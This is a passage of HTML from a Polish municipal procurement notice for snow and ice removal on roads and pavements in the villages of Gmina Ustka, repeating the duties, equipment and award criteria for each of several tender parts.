oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 17 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego w przypadku wystąpienia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> c) część III rejon nr 3 – sołectwo Wodnica, rejon nr 6 – sołectwo Lędowo (części składowe: Lędowo, Modła, Lędowo –Osiedle, Modlinek)<br/>Zakres zamówienia obejmuje usługę mechanicznego usuwania śniegu oraz usuwania śliskości (piaskiem, mieszanką piasku<br/>i soli 3:1) po stwierdzeniu mżawki, lodowicy, gołoledzi, szadzi, szronu, śliskości pośniegowej.<br/>Wykonawca w celu realizacji przedmiotu umowy zobowiązany jest do;<br/>1) prowadzenia całodobowych obserwacji zjawisk atmosferycznych mających wpływ na stan nawierzchni dróg, chodników i<br/>ciągów pieszo-jezdnych oraz mają wpływ na samodzielne podjęcie działań,<br/>2) samodzielne przystąpienia do odśnieżania nawierzchni dróg, chodników, ciągów pieszo – jezdnych na terenie Gminy<br/>Ustka (zgodnie z załącznikiem graficznym) po stwierdzeniu warstwy zalegania śniegu o grubości powyżej 5 cm, w czasie do<br/>dwóch godzin od ustania opadów śniegu lub po wystąpieniu śliskości nawierzchni – bez dodatkowego zlecenia usług;<br/>jednakże Zamawiający ma prawo wstrzymać prace Wykonawcy w ciągu 15 min od otrzymania od niego wiadomości o<br/>planowanym przystąpieniu do prac;<br/>3) informowania każdorazowo Zamawiającego o rozpoczęciu i zakończeniu czynności wskazanych w pkt 2) - wiadomością<br/>SMS na numer tel…...(zostanie podany w dniu podpisania umowy);<br/>4) zapewnienia stałej łączności telefonicznej z upoważnionym pracownikiem Urzędu Gminy Ustka oraz z Sołtysem lub<br/>Radnym danej miejscowości;<br/>5) do uprzątnięcia i wywozu nadmiaru pozostałego piasku z dróg, chodników i ciągów pieszo-jezdnych swojej części<br/>przedmiotu zamówienia.<br/>Podstawą do rozliczenia będą zliczone długości wykonanych odcinków dróg, chodników i ciągów pieszo-jezdnych oraz<br/>kontrolne wydruki z przekazanych Wykonawcy przez Zamawiającego urządzeń GPS potwierdzające wykonanie usługi.<br/>Zamawiający może zlecić Wykonawcy wykonanie dodatkowych usług i przystąpienie do ich realizacji powinno nastąpić<br/>niezwłocznie jednak nie później niż przed upływem 2 godzin po otrzymaniu telefonicznego zlecenia od Sołtysa lub Radnego<br/>miejscowości wskazanej w § 1 ust. 1 umowy lub upoważnionego pracownika Urzędu Gminy Ustka, które może być<br/>przekazane w ciągu całej doby.<br/>Wykonawca ubiegający się o zamówienie powinien dysponować:<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni dróg, ciągów pieszo – jezdnych,<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni chodników o masie całkowitej do 2,5 Mg,<br/>- pojazdem ze sprzętem do usuwania śliskości (sypanie piachem i mieszanką piachu i soli 3:1),<br/>Pojazdy muszą mieć możliwość podłączenia przekazanego przez Zamawiającego urządzenia GPS do gniazda zapalniczki.<br/>Przez pojazd należy rozumieć pojazd o napędzie spalinowym, elektrycznym, hybrydowym (samochód ciężarowy, ciągnik,<br/>maszyna drogowa, koparka, koparko – ładowarka).<br/>Przez pług śnieżny należy rozumieć urządzenie składające się z odkładnicy, lemiesza i zawieszenia, montowane na nośniku<br/>pługa.<br/>Przez usuwanie śliskości należy rozumieć usunięcie z nawierzchni drogi lodu lub zlodowaciałego albo ubitego śniegu przy<br/>użyciu środków chemicznych, uszorstniających lub mechanicznych albo środków tych łącznie.<br/>Przez sprzęt do usuwania śliskości należy rozumieć rozsypywarki (piaskarki, solarki, piaskarko-solarki), dozujące i<br/>rozsypujące materiały, urządzenia współpracujące, np. ładowarki w składowiskach materiałów, zbiorniki solanki, itp.<br/>Zamawiający informuje, iż drogi o nawierzchni betonowej nie mogą być posypywane mieszanką piasku i soli a jedynie<br/>piaskiem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 17 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego w przypadku wystąpienia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> d) część IV rejon nr 7 – sołectwo Duninowo (części składowe: Duninowo, Duninówko),<br/>rejon nr 10 – sołectwo Zaleskie (części składowe: Zaleskie, Zabłocie), rejon nr 11 – sołectwo Pęplino)<br/>Zakres zamówienia obejmuje usługę mechanicznego usuwania śniegu oraz usuwania śliskości (piaskiem, mieszanką piasku<br/>i soli 3:1) po stwierdzeniu mżawki, lodowicy, gołoledzi, szadzi, szronu, śliskości pośniegowej.<br/>Wykonawca w celu realizacji przedmiotu umowy zobowiązany jest do;<br/>1) prowadzenia całodobowych obserwacji zjawisk atmosferycznych mających wpływ na stan nawierzchni dróg, chodników i<br/>ciągów pieszo-jezdnych oraz mają wpływ na samodzielne podjęcie działań,<br/>2) samodzielne przystąpienia do odśnieżania nawierzchni dróg, chodników, ciągów pieszo – jezdnych na terenie Gminy<br/>Ustka (zgodnie z załącznikiem graficznym) po stwierdzeniu warstwy zalegania śniegu o grubości powyżej 5 cm, w czasie do<br/>dwóch godzin od ustania opadów śniegu lub po wystąpieniu śliskości nawierzchni – bez dodatkowego zlecenia usług;<br/>jednakże Zamawiający ma prawo wstrzymać prace Wykonawcy w ciągu 15 min od otrzymania od niego wiadomości o<br/>planowanym przystąpieniu do prac;<br/>3) informowania każdorazowo Zamawiającego o rozpoczęciu i zakończeniu czynności wskazanych w pkt 2) - wiadomością<br/>SMS na numer tel…...(zostanie podany w dniu podpisania umowy);<br/>4) zapewnienia stałej łączności telefonicznej z upoważnionym pracownikiem Urzędu Gminy Ustka oraz z Sołtysem lub<br/>Radnym danej miejscowości;<br/>5) do uprzątnięcia i wywozu nadmiaru pozostałego piasku z dróg, chodników i ciągów pieszo-jezdnych swojej części<br/>przedmiotu zamówienia.<br/>Podstawą do rozliczenia będą zliczone długości wykonanych odcinków dróg, chodników i ciągów pieszo-jezdnych oraz<br/>kontrolne wydruki z przekazanych Wykonawcy przez Zamawiającego urządzeń GPS potwierdzające wykonanie usługi.<br/>Zamawiający może zlecić Wykonawcy wykonanie dodatkowych usług i przystąpienie do ich realizacji powinno nastąpić<br/>niezwłocznie jednak nie później niż przed upływem 2 godzin po otrzymaniu telefonicznego zlecenia od Sołtysa lub Radnego<br/>miejscowości wskazanej w § 1 ust. 1 umowy lub upoważnionego pracownika Urzędu Gminy Ustka, które może być<br/>przekazane w ciągu całej doby.<br/>Wykonawca ubiegający się o zamówienie powinien dysponować:<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni dróg, ciągów pieszo – jezdnych,<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni chodników o masie całkowitej do 2,5 Mg,<br/>- pojazdem ze sprzętem do usuwania śliskości (sypanie piachem i mieszanką piachu i soli 3:1),<br/>Pojazdy muszą mieć możliwość podłączenia przekazanego przez Zamawiającego urządzenia GPS do gniazda zapalniczki.<br/>Przez pojazd należy rozumieć pojazd o napędzie spalinowym, elektrycznym, hybrydowym (samochód ciężarowy, ciągnik,<br/>maszyna drogowa, koparka, koparko – ładowarka).<br/>Przez pług śnieżny należy rozumieć urządzenie składające się z odkładnicy, lemiesza i zawieszenia, montowane na nośniku<br/>pługa.<br/>Przez usuwanie śliskości należy rozumieć usunięcie z nawierzchni drogi lodu lub zlodowaciałego albo ubitego śniegu przy<br/>użyciu środków chemicznych, uszorstniających lub mechanicznych albo środków tych łącznie.<br/>Przez sprzęt do usuwania śliskości należy rozumieć rozsypywarki (piaskarki, solarki, piaskarko-solarki), dozujące i<br/>rozsypujące materiały, urządzenia współpracujące, np. ładowarki w składowiskach materiałów, zbiorniki solanki, itp.<br/>Zamawiający informuje, iż drogi o nawierzchni betonowej nie mogą być posypywane mieszanką piasku i soli a jedynie<br/>piaskiem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 17 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego w przypadku wystąpienia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część V rejon nr 8 – sołectwo Starkowo (części składowe: Starkowo, Krężołki, Golęcino), rejon nr 9 – sołectwo Możdżanowo<br/>Zakres zamówienia obejmuje usługę mechanicznego usuwania śniegu oraz usuwania śliskości (piaskiem, mieszanką piasku<br/>i soli 3:1) po stwierdzeniu mżawki, lodowicy, gołoledzi, szadzi, szronu, śliskości pośniegowej.<br/>Wykonawca w celu realizacji przedmiotu umowy zobowiązany jest do;<br/>1) prowadzenia całodobowych obserwacji zjawisk atmosferycznych mających wpływ na stan nawierzchni dróg, chodników i<br/>ciągów pieszo-jezdnych oraz mają wpływ na samodzielne podjęcie działań,<br/>2) samodzielne przystąpienia do odśnieżania nawierzchni dróg, chodników, ciągów pieszo – jezdnych na terenie Gminy<br/>Ustka (zgodnie z załącznikiem graficznym) po stwierdzeniu warstwy zalegania śniegu o grubości powyżej 5 cm, w czasie do<br/>dwóch godzin od ustania opadów śniegu lub po wystąpieniu śliskości nawierzchni – bez dodatkowego zlecenia usług;<br/>jednakże Zamawiający ma prawo wstrzymać prace Wykonawcy w ciągu 15 min od otrzymania od niego wiadomości o<br/>planowanym przystąpieniu do prac;<br/>3) informowania każdorazowo Zamawiającego o rozpoczęciu i zakończeniu czynności wskazanych w pkt 2) - wiadomością<br/>SMS na numer tel…...(zostanie podany w dniu podpisania umowy);<br/>4) zapewnienia stałej łączności telefonicznej z upoważnionym pracownikiem Urzędu Gminy Ustka oraz z Sołtysem lub<br/>Radnym danej miejscowości;<br/>5) do uprzątnięcia i wywozu nadmiaru pozostałego piasku z dróg, chodników i ciągów pieszo-jezdnych swojej części<br/>przedmiotu zamówienia.<br/>Podstawą do rozliczenia będą zliczone długości wykonanych odcinków dróg, chodników i ciągów pieszo-jezdnych oraz<br/>kontrolne wydruki z przekazanych Wykonawcy przez Zamawiającego urządzeń GPS potwierdzające wykonanie usługi.<br/>Zamawiający może zlecić Wykonawcy wykonanie dodatkowych usług i przystąpienie do ich realizacji powinno nastąpić<br/>niezwłocznie jednak nie później niż przed upływem 2 godzin po otrzymaniu telefonicznego zlecenia od Sołtysa lub Radnego<br/>miejscowości wskazanej w § 1 ust. 1 umowy lub upoważnionego pracownika Urzędu Gminy Ustka, które może być<br/>przekazane w ciągu całej doby.<br/>Wykonawca ubiegający się o zamówienie powinien dysponować:<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni dróg, ciągów pieszo – jezdnych,<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni chodników o masie całkowitej do 2,5 Mg,<br/>- pojazdem ze sprzętem do usuwania śliskości (sypanie piachem i mieszanką piachu i soli 3:1),<br/>Pojazdy muszą mieć możliwość podłączenia przekazanego przez Zamawiającego urządzenia GPS do gniazda zapalniczki.<br/>Przez pojazd należy rozumieć pojazd o napędzie spalinowym, elektrycznym, hybrydowym (samochód ciężarowy, ciągnik,<br/>maszyna drogowa, koparka, koparko – ładowarka).<br/>Przez pług śnieżny należy rozumieć urządzenie składające się z odkładnicy, lemiesza i zawieszenia, montowane na nośniku<br/>pługa.<br/>Przez usuwanie śliskości należy rozumieć usunięcie z nawierzchni drogi lodu lub zlodowaciałego albo ubitego śniegu przy<br/>użyciu środków chemicznych, uszorstniających lub mechanicznych albo środków tych łącznie.<br/>Przez sprzęt do usuwania śliskości należy rozumieć rozsypywarki (piaskarki, solarki, piaskarko-solarki), dozujące i<br/>rozsypujące materiały, urządzenia współpracujące, np. ładowarki w składowiskach materiałów, zbiorniki solanki, itp.<br/>Zamawiający informuje, iż drogi o nawierzchni betonowej nie mogą być posypywane mieszanką piasku i soli a jedynie<br/>piaskiem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 17 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego w przypadku wystąpienia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część VI rejon nr 12 – sołectwo Rowy, rejon nr 13 – sołectwo Dębina<br/>Zakres zamówienia obejmuje usługę mechanicznego usuwania śniegu oraz usuwania śliskości (piaskiem, mieszanką piasku<br/>i soli 3:1) po stwierdzeniu mżawki, lodowicy, gołoledzi, szadzi, szronu, śliskości pośniegowej.<br/>Wykonawca w celu realizacji przedmiotu umowy zobowiązany jest do;<br/>1) prowadzenia całodobowych obserwacji zjawisk atmosferycznych mających wpływ na stan nawierzchni dróg, chodników i<br/>ciągów pieszo-jezdnych oraz mają wpływ na samodzielne podjęcie działań,<br/>2) samodzielne przystąpienia do odśnieżania nawierzchni dróg, chodników, ciągów pieszo – jezdnych na terenie Gminy<br/>Ustka (zgodnie z załącznikiem graficznym) po stwierdzeniu warstwy zalegania śniegu o grubości powyżej 5 cm, w czasie do<br/>dwóch godzin od ustania opadów śniegu lub po wystąpieniu śliskości nawierzchni – bez dodatkowego zlecenia usług;<br/>jednakże Zamawiający ma prawo wstrzymać prace Wykonawcy w ciągu 15 min od otrzymania od niego wiadomości o<br/>planowanym przystąpieniu do prac;<br/>3) informowania każdorazowo Zamawiającego o rozpoczęciu i zakończeniu czynności wskazanych w pkt 2) - wiadomością<br/>SMS na numer tel…...(zostanie podany w dniu podpisania umowy);<br/>4) zapewnienia stałej łączności telefonicznej z upoważnionym pracownikiem Urzędu Gminy Ustka oraz z Sołtysem lub<br/>Radnym danej miejscowości;<br/>5) do uprzątnięcia i wywozu nadmiaru pozostałego piasku z dróg, chodników i ciągów pieszo-jezdnych swojej części<br/>przedmiotu zamówienia.<br/>Podstawą do rozliczenia będą zliczone długości wykonanych odcinków dróg, chodników i ciągów pieszo-jezdnych oraz<br/>kontrolne wydruki z przekazanych Wykonawcy przez Zamawiającego urządzeń GPS potwierdzające wykonanie usługi.<br/>Zamawiający może zlecić Wykonawcy wykonanie dodatkowych usług i przystąpienie do ich realizacji powinno nastąpić<br/>niezwłocznie jednak nie później niż przed upływem 2 godzin po otrzymaniu telefonicznego zlecenia od Sołtysa lub Radnego<br/>miejscowości wskazanej w § 1 ust. 1 umowy lub upoważnionego pracownika Urzędu Gminy Ustka, które może być<br/>przekazane w ciągu całej doby.<br/>Wykonawca ubiegający się o zamówienie powinien dysponować:<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni dróg, ciągów pieszo – jezdnych,<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni chodników o masie całkowitej do 2,5 Mg,<br/>- pojazdem ze sprzętem do usuwania śliskości (sypanie piachem i mieszanką piachu i soli 3:1),<br/>Pojazdy muszą mieć możliwość podłączenia przekazanego przez Zamawiającego urządzenia GPS do gniazda zapalniczki.<br/>Przez pojazd należy rozumieć pojazd o napędzie spalinowym, elektrycznym, hybrydowym (samochód ciężarowy, ciągnik,<br/>maszyna drogowa, koparka, koparko – ładowarka).<br/>Przez pług śnieżny należy rozumieć urządzenie składające się z odkładnicy, lemiesza i zawieszenia, montowane na nośniku<br/>pługa.<br/>Przez usuwanie śliskości należy rozumieć usunięcie z nawierzchni drogi lodu lub zlodowaciałego albo ubitego śniegu przy<br/>użyciu środków chemicznych, uszorstniających lub mechanicznych albo środków tych łącznie.<br/>Przez sprzęt do usuwania śliskości należy rozumieć rozsypywarki (piaskarki, solarki, piaskarko-solarki), dozujące i<br/>rozsypujące materiały, urządzenia współpracujące, np. ładowarki w składowiskach materiałów, zbiorniki solanki, itp.<br/>Zamawiający informuje, iż drogi o nawierzchni betonowej nie mogą być posypywane mieszanką piasku i soli a jedynie<br/>piaskiem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 17 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego w przypadku wystąpienia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część VII rejon 14 – sołectwo Objazda (części składowe: Objazda, Bałamątek), rejon nr 15 – sołectwo Gąbino (części<br/>składowe: Gąbino, Dominek, Osieki Słupskie)<br/>Zakres zamówienia obejmuje usługę mechanicznego usuwania śniegu oraz usuwania śliskości (piaskiem, mieszanką piasku<br/>i soli 3:1) po stwierdzeniu mżawki, lodowicy, gołoledzi, szadzi, szronu, śliskości pośniegowej.<br/>Wykonawca w celu realizacji przedmiotu umowy zobowiązany jest do;<br/>1) prowadzenia całodobowych obserwacji zjawisk atmosferycznych mających wpływ na stan nawierzchni dróg, chodników i<br/>ciągów pieszo-jezdnych oraz mają wpływ na samodzielne podjęcie działań,<br/>2) samodzielne przystąpienia do odśnieżania nawierzchni dróg, chodników, ciągów pieszo – jezdnych na terenie Gminy<br/>Ustka (zgodnie z załącznikiem graficznym) po stwierdzeniu warstwy zalegania śniegu o grubości powyżej 5 cm, w czasie do<br/>dwóch godzin od ustania opadów śniegu lub po wystąpieniu śliskości nawierzchni – bez dodatkowego zlecenia usług;<br/>jednakże Zamawiający ma prawo wstrzymać prace Wykonawcy w ciągu 15 min od otrzymania od niego wiadomości o<br/>planowanym przystąpieniu do prac;<br/>3) informowania każdorazowo Zamawiającego o rozpoczęciu i zakończeniu czynności wskazanych w pkt 2) - wiadomością<br/>SMS na numer tel…...(zostanie podany w dniu podpisania umowy);<br/>4) zapewnienia stałej łączności telefonicznej z upoważnionym pracownikiem Urzędu Gminy Ustka oraz z Sołtysem lub<br/>Radnym danej miejscowości;<br/>5) do uprzątnięcia i wywozu nadmiaru pozostałego piasku z dróg, chodników i ciągów pieszo-jezdnych swojej części<br/>przedmiotu zamówienia.<br/>Podstawą do rozliczenia będą zliczone długości wykonanych odcinków dróg, chodników i ciągów pieszo-jezdnych oraz<br/>kontrolne wydruki z przekazanych Wykonawcy przez Zamawiającego urządzeń GPS potwierdzające wykonanie usługi.<br/>Zamawiający może zlecić Wykonawcy wykonanie dodatkowych usług i przystąpienie do ich realizacji powinno nastąpić<br/>niezwłocznie jednak nie później niż przed upływem 2 godzin po otrzymaniu telefonicznego zlecenia od Sołtysa lub Radnego<br/>miejscowości wskazanej w § 1 ust. 1 umowy lub upoważnionego pracownika Urzędu Gminy Ustka, które może być<br/>przekazane w ciągu całej doby.<br/>Wykonawca ubiegający się o zamówienie powinien dysponować:<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni dróg, ciągów pieszo – jezdnych,<br/>- pojazdem z pługiem śnieżnym do mechanicznego usuwania śniegu z nawierzchni chodników o masie całkowitej do 2,5 Mg,<br/>- pojazdem ze sprzętem do usuwania śliskości (sypanie piachem i mieszanką piachu i soli 3:1),<br/>Pojazdy muszą mieć możliwość podłączenia przekazanego przez Zamawiającego urządzenia GPS do gniazda zapalniczki.<br/>Przez pojazd należy rozumieć pojazd o napędzie spalinowym, elektrycznym, hybrydowym (samochód ciężarowy, ciągnik,<br/>maszyna drogowa, koparka, koparko – ładowarka).<br/>Przez pług śnieżny należy rozumieć urządzenie składające się z odkładnicy, lemiesza i zawieszenia, montowane na nośniku pługa.<br/>Przez usuwanie śliskości należy rozumieć usunięcie z nawierzchni drogi lodu lub zlodowaciałego albo ubitego śniegu przy<br/>użyciu środków chemicznych, uszorstniających lub mechanicznych albo środków tych łącznie.<br/>Przez sprzęt do usuwania śliskości należy rozumieć rozsypywarki (piaskarki, solarki, piaskarko-solarki), dozujące i<br/>rozsypujące materiały, urządzenia współpracujące, np. ładowarki w składowiskach materiałów, zbiorniki solanki, itp.<br/>Zamawiający informuje, iż drogi o nawierzchni betonowej nie mogą być posypywane mieszanką piasku i soli a jedynie<br/>piaskiem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 17 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 